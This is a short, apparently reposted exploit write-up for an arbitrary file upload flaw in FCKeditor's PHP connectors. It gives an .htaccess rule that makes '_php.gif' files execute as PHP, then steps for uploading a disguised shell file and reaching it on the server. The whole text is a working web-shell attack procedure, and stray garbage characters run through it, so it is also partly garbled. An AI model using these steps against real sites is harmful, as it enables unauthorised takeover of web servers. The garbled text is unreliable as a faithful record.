FCKeditor所有php版本Upload上传漏洞3 m3 @6 [& d9 j0 N- ] B
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
$ f6 h& ^% m7 N减小字体 增大字体- c. h6 @0 ? S0 k9 G
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
F. p! t) J f2 w! b, x) c[+] Date: 2011
5 O" s) y; N6 V5 ]% h[+] Author : sinesafe.cn- C8 V1 l( O4 q$ V' Y" U
[+] Website : WwW.sinesafe.cn
8 h9 b- ]# F* F! y0 ^———————————————————
D+ l" L D8 Z9 Y5 j1.create a htaccess file:, n, L4 o9 y7 k; }& f9 ~; X; V
code:
1 a: P8 J( N% {& G1 I<FilesMatch “_php.gif”>' c9 K% N; ~& q$ ?1 v
SetHandler application/x-httpd-php% I5 {0 u( A7 J+ J
</FilesMatch>+ j0 W1 \. L- ]9 F
! Y \4 k3 {& G' ?2.Now upload this htaccess with FCKeditor.: q4 m- I, ?, Q9 G, n
7 v7 L" s; H, E& j0 Y1 c5 Q0 _http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
W% u( S: v( |* I; I5 |8 i# }; D F) }- K p4 m5 k9 Z/ R
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
7 Q$ {. Y# m9 Y* Y6 A! `- P8 W
7 I+ i- y7 ?* K———————————————————————————————-
; g# n) z* d9 @" P; P6 o3.Now upload shell.php.gif with FCKeditor.% K& \( x% F9 |0 l! Q
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.% `: W0 z' D$ O+ K8 {2 Q. m! { {
5.http://www.sinesafe.cn/anything/shell_php.gif, p' h3 o- v: n4 V# _( p. ?3 f( D+ v+ f
6.Now shell is available from server. | " x6 \3 W' R6 a' p
) O& X! [9 Z& Z# N2 X9 {* V
. N" Q+ ^) u% W8 @) o: b |